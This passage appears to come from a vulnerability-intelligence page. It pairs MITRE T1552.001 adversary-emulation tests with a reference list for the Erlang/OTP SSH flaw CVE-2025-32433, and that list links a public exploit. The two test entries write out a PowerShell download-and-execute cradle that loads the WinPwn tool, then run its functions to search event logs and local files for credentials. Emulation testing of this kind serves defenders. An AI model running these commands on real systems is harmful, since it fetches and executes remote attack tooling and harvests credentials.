T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (15)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2025-32433
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
github.com
GitHub CVE x_refsource_MISC
https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12
github.com
GitHub CVE x_refsource_MISC
https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f
github.com
GitHub CVE x_refsource_MISC
https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2025/04/16/2
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2025/04/18/1
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2025/04/18/2
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2025/04/18/6
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2025/04/19/1
lists.debian.org
NVD API Third Party Advisory
https://lists.debian.org/debian-lts-announce/2025/04/msg00028.html
security.netapp.com
NVD API Third Party Advisory
https://security.netapp.com/advisory/ntap-20250425-0001/
github.com
NVD API Exploit
https://github.com/ProDefense/CVE-2025-32433/blob/main/CVE-2025-32433.py
sec.cloudapps.cisco.com
NVD API Third Party Advisory
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32433